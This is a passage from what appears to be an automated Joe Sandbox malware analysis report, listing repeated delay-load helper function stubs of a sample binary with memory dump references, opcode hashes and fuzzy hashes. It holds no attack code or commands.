                                                                                                                    • Instruction Fuzzy Hash: 14B012F2268041BD3544D1461C47D3701CCC0C1F1033080FEFC25D5080ED80ED800432
                                                                                                                    Function 00B9E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 84a3a22a8c360373edd93b08c81d0648666638f51279bc820ec2e0aeb9b5e0c2
                                                                                                                    • Instruction ID: 8bf1668b7f44bb63769622a09dfaad0a9dd1b92b7757d86dce25fe9dca9376c2
                                                                                                                    • Opcode Fuzzy Hash: 84a3a22a8c360373edd93b08c81d0648666638f51279bc820ec2e0aeb9b5e0c2
                                                                                                                    • Instruction Fuzzy Hash: 74B012D2268041BD3504D2461D47D3701CCC0C0F1033080FEF825D5180ED90ED890432
                                                                                                                    Function 00B9E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 1f4f8df62c21adb4f5cd8f5da1389e4b357a214304819b13fcae22707b0f4c5d
                                                                                                                    • Instruction ID: 0a4d33a724a23d863cb51be74fdbc127d7ab2a0b159474185747f1e6f5dd4ccc
                                                                                                                    • Opcode Fuzzy Hash: 1f4f8df62c21adb4f5cd8f5da1389e4b357a214304819b13fcae22707b0f4c5d
                                                                                                                    • Instruction Fuzzy Hash: A1B012D2368181BD3544D2462C47D3701CCC0C0F1033081FEF825D5180ED80ECC40432
                                                                                                                    Function 00B9E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: bf219f8138e1cdf5d1ad1fbf63488372931a69071167b5db3b491aee5749dbb6
                                                                                                                    • Instruction ID: 483c2c9bbe8cca67849d5dd6b16e1d5b0d98c6c63e03d9aca26ee27f8fae9de8
                                                                                                                    • Opcode Fuzzy Hash: bf219f8138e1cdf5d1ad1fbf63488372931a69071167b5db3b491aee5749dbb6
                                                                                                                    • Instruction Fuzzy Hash: 04B012D2268041AD3504D1561C87D3701CCC0C1F1033080FEFC25D5080EE80EC801432
                                                                                                                    Function 00B9E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ba0947cb1841828a35586372298b4420d9cb4011f3859d9e31579a80ced24c90
                                                                                                                    • Instruction ID: 6aff1dd5fe83870db69cd6fc21c7ed6a444c67c1b155596ff416af99d9295ea9
                                                                                                                    • Opcode Fuzzy Hash: ba0947cb1841828a35586372298b4420d9cb4011f3859d9e31579a80ced24c90
                                                                                                                    • Instruction Fuzzy Hash: F3B012D2279081AD3504D1461C47D3701CDD4C0F1133040FEF826D5080ED80EC800432
                                                                                                                    Function 00B9E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 971ce5cc0f7e0340c0aa686615b680f2ba0d621ee9f0ba55c6dc930caf7dd98d
                                                                                                                    • Instruction ID: 086dee885cf3304af1f1f54dd3fb2d2c23bd266c67baf6b47a39a000368693cc
                                                                                                                    • Opcode Fuzzy Hash: 971ce5cc0f7e0340c0aa686615b680f2ba0d621ee9f0ba55c6dc930caf7dd98d
                                                                                                                    • Instruction Fuzzy Hash: D6B012E2269181BD3544D2461C47D3B01CDC0C0F1133041FEF825D5080ED80ECC40432
                                                                                                                    Function 00B9E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b508fcc098247d16642f1a8867fb7d8fa3bc75c94385124b3518eb8b97df845f
                                                                                                                    • Instruction ID: cb16198f1bc431c4d203a0d89611d47a887653269ffcc31528ed00f8b5b96485
                                                                                                                    • Opcode Fuzzy Hash: b508fcc098247d16642f1a8867fb7d8fa3bc75c94385124b3518eb8b97df845f
                                                                                                                    • Instruction Fuzzy Hash: 6AB012D2269081AD3504D1461C47D3701CDC0C1F1133080FEFC25D5080ED80EC800432
                                                                                                                    Function 00B9E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fe368db3f8a6b4139d0e7c271e93a2b283a967e986585ee6083ec1f8e240f63d
                                                                                                                    • Instruction ID: 1bd2f49c6788413be33fcadd489ea7d4a843b98929f56dbfdde5c45f3436ee8a
                                                                                                                    • Opcode Fuzzy Hash: fe368db3f8a6b4139d0e7c271e93a2b283a967e986585ee6083ec1f8e240f63d
                                                                                                                    • Instruction Fuzzy Hash: 5AB092B2268040BD3584D1465886E3602C8C080F1033084FAB825C6081E8808A000432
                                                                                                                    Function 00B9E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 79e21bff93720e5223c86a5fb7c3784971923adc846b8270476c7ad46afcfa73
                                                                                                                    • Instruction ID: 7f4d67bb26fe86d0805c6ae0ff55293ebf3d283c063ed7a17835d3cab3a4afe9
                                                                                                                    • Opcode Fuzzy Hash: 79e21bff93720e5223c86a5fb7c3784971923adc846b8270476c7ad46afcfa73
                                                                                                                    • Instruction Fuzzy Hash: 2DB092A22680407D3544D1465986E7602C8C080B2033084FAB525C6081A88088090432
                                                                                                                    Function 00B9E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 42ff5250ec24897407756a6b84bdc40bbff176fef9fdebdc8635673965b79def
                                                                                                                    • Instruction ID: e9ece5d27ea8a2a1ff18f658ee338b00a0f11cf87c2cb657594a4e13281ff67d
                                                                                                                    • Opcode Fuzzy Hash: 42ff5250ec24897407756a6b84bdc40bbff176fef9fdebdc8635673965b79def
                                                                                                                    • Instruction Fuzzy Hash: 5CB092A2268040BD3584D1465886E3602C8C080B1033084FAB825C6081E88088040432
                                                                                                                    Function 00B9E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c323b5082ded1fdd034f723186bb6d8d5fecd91e3039e964a5bee73f907b8f9f
                                                                                                                    • Instruction ID: 36dc6930757e01ca1b66113bb3ad58914f536995854770f6d3d857de94a64a00
                                                                                                                    • Opcode Fuzzy Hash: c323b5082ded1fdd034f723186bb6d8d5fecd91e3039e964a5bee73f907b8f9f
                                                                                                                    • Instruction Fuzzy Hash: 02B092822681407D3544D1955846D3602D8C081B1032142FEF425D2090B88088400436
                                                                                                                    Function 00B9E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 822dde4cb41474f5eb80a46a98a177a0c1136164e21354c0bc87c1ad54c0ee68
                                                                                                                    • Instruction ID: f309bef34834f63b40f3a36fe228b2db7192516750b170612e64b2d838ab2c57
                                                                                                                    • Opcode Fuzzy Hash: 822dde4cb41474f5eb80a46a98a177a0c1136164e21354c0bc87c1ad54c0ee68
                                                                                                                    • Instruction Fuzzy Hash: AEB012C22680407D3504D1955D46D3702DCC0C1F1033143FFF425D30D0FC818D010436
                                                                                                                    Function 00B9E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: f42dd3b85114e509e227a5fda4204a31de893c920e730d46000278a158f3d0e3
                                                                                                                    • Instruction ID: 81aa29e4b4845bcb2b839f0725a3f54828884caef5f63bc65721af85e3b4e061
                                                                                                                    • Opcode Fuzzy Hash: f42dd3b85114e509e227a5fda4204a31de893c920e730d46000278a158f3d0e3
                                                                                                                    • Instruction Fuzzy Hash: 0EB012C32680407E3504D1951C46D3702CCC0C0F1033140FFF425D30D0FC808C000436
                                                                                                                    Function 00B9E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 29152f887a1434fada9eef6cf6532bb7925e0a2f4472499b4375df6fffb47938
                                                                                                                    • Instruction ID: fe0287b1f1f0598d3deda22462d416edf815db1a9ec4b649aa98f573713b0773
                                                                                                                    • Opcode Fuzzy Hash: 29152f887a1434fada9eef6cf6532bb7925e0a2f4472499b4375df6fffb47938
                                                                                                                    • Instruction Fuzzy Hash: 5BB012C32680407E3504D1491C46F7B06CCC0C2F1033080FEF425C2091FC80CD000431
                                                                                                                    Function 00B9E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
